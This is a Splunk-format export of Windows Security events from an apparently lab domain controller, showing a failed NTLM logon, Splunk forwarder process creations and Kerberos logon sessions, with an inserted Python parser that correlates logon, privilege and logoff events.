ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263878
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: bwadmin
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: Windows8
Source Network Address: 193.169.255.186
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:33:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263879
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:33:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263881
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b90
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:33:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263880
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd00
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:33:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263882
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:33:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263883
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x980
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:33:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263885
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xccc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:33:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263884
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a24
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:33:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263888
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x77988F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:33:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263887
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x77988F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51622
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:33:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263886
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x77988F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
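Added example (not part of the exported log, and not Splunk or Microsoft code): a Python parser for the multiline Splunk export format used on this page. It joins the 4624 logon, the 4672 privilege assignment and the 4634 logoff on Logon ID, taking the ID from the New Logon block for 4624 (its Subject block is the requesting account, NULL SID here) and from the Subject block for 4634 and 4672, and keys sessions on (host, Logon ID) because, as the 4634 description says, Logon IDs are only unique between reboots on one machine. It also flattens 4688 into parent/child rows and decodes the Token Elevation Type message-table token (%%1936, %%1937, %%1938 map to Type 1, 2 and 3 in the description above). The SAMPLE string is a constructed, trimmed copy of four records of the shape seen on this page; field and section names are the ones Windows emits. Note that the page lists newest RecordNumber first within a timestamp, so the logoff (263888) appears before the logon (263887) and its 4672 (263886); the parser does not depend on order.

```python
import re

TS_RE = re.compile(r"^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2} [AP]M$")
# Message-table tokens behind the 4688 "Token Elevation Type" field:
# %%1936 = Type 1 (full/default), %%1937 = Type 2 (elevated), %%1938 = Type 3 (limited)
TOKEN_ELEVATION = {"%%1936": 1, "%%1937": 2, "%%1938": 3}

# Constructed sample: trimmed copies of four records in the shape seen on this page.
SAMPLE = r"""04/19/2021 02:33:55 PM
EventCode=4634
ComputerName=win-dc-209.attackrange.local
Message=An account was logged off.
Subject:
Logon ID: 0x77988F
This event is generated when a logon session is destroyed.
04/19/2021 02:33:55 PM
EventCode=4624
ComputerName=win-dc-209.attackrange.local
Message=An account was successfully logged on.
Subject:
Logon ID: 0x0
Logon Information:
Logon Type: 3
New Logon:
Account Name: WIN-DC-209$
Logon ID: 0x77988F
Network Information:
Source Network Address: ::1
04/19/2021 02:33:55 PM
EventCode=4672
ComputerName=win-dc-209.attackrange.local
Message=Special privileges assigned to new logon.
Subject:
Logon ID: 0x77988F
Privileges: SeSecurityPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
04/19/2021 02:33:14 PM
EventCode=4688
ComputerName=win-dc-209.attackrange.local
Message=A new process has been created.
Creator Subject:
Logon ID: 0x3E7
Process Information:
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
"""

def parse_events(text):
    """A record starts at a timestamp line; header lines are Key=Value; the body after
    Message= is 'Section:' and 'Field: Value' lines, stored under 'Section/Field'."""
    events, ev, section, last = [], None, None, None
    for line in map(str.strip, text.splitlines()):
        if TS_RE.match(line):
            ev, section, last = {"timestamp": line, "fields": {}}, None, None
            events.append(ev)
        elif ev is None:
            continue
        elif "Message" not in ev and "=" in line:
            key, value = line.split("=", 1)
            ev[key] = value
        elif line.endswith(":"):
            section = line[:-1]
        elif ": " in line:
            key, value = line.split(": ", 1)
            last = f"{section}/{key}" if section else key
            ev["fields"][last] = value
        elif last and last.endswith("/Privileges"):
            ev["fields"][last] += " " + line  # 4672 lists one privilege per line
        # any other line is the event's explanatory prose and is skipped
    return events

def correlate_sessions(events):
    """Join 4624 (logon), 4672 (privileges) and 4634 (logoff) on Logon ID. 4624 carries it
    under New Logon (its Subject is the requester); 4634 and 4672 carry it under Subject.
    Logon IDs are unique only per host between reboots, so key on (host, Logon ID)."""
    sessions = {}
    for ev in events:
        code, flds = ev["EventCode"], ev["fields"]
        if code not in ("4624", "4672", "4634"):
            continue
        section = "New Logon" if code == "4624" else "Subject"
        s = sessions.setdefault((ev["ComputerName"], flds[section + "/Logon ID"]), {})
        if code == "4624":
            s.update(account=flds["New Logon/Account Name"], logon_type=flds["Logon Information/Logon Type"],
                     source=flds["Network Information/Source Network Address"], logon_time=ev["timestamp"])
        elif code == "4672":
            s["privileges"] = flds["Subject/Privileges"].split()
        else:
            s["logoff_time"] = ev["timestamp"]
    return sessions

def process_creations(events):
    """Flatten 4688 into parent -> child rows with the elevation token decoded."""
    return [{"parent": e["fields"]["Process Information/Creator Process Name"],
             "child": e["fields"]["Process Information/New Process Name"],
             "creator_logon_id": e["fields"]["Creator Subject/Logon ID"],
             "elevation_type": TOKEN_ELEVATION.get(e["fields"]["Process Information/Token Elevation Type"])}
            for e in events if e["EventCode"] == "4688"]
```

Run against a full export, correlate_sessions gives one dict per (host, Logon ID) holding the logon source, type, privileges and both timestamps, which is the join the 4634 description recommends; sessions missing a logoff_time are still open. The 4688 rows keep the creator's Logon ID separately: 0x3E7 is the SYSTEM logon session, so for the splunkd.exe children above it identifies the service session, not an interactive user.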
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263899
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x779CE3
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263898
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x779DD1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263897
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x779E19
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263896
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x779E93
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51627
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263895
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x779E93
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263894
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x779E19
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 51626
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263893
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x779E19
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263892
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x779DD1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263891
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x779DD1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263890
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x779CE3
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51625
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
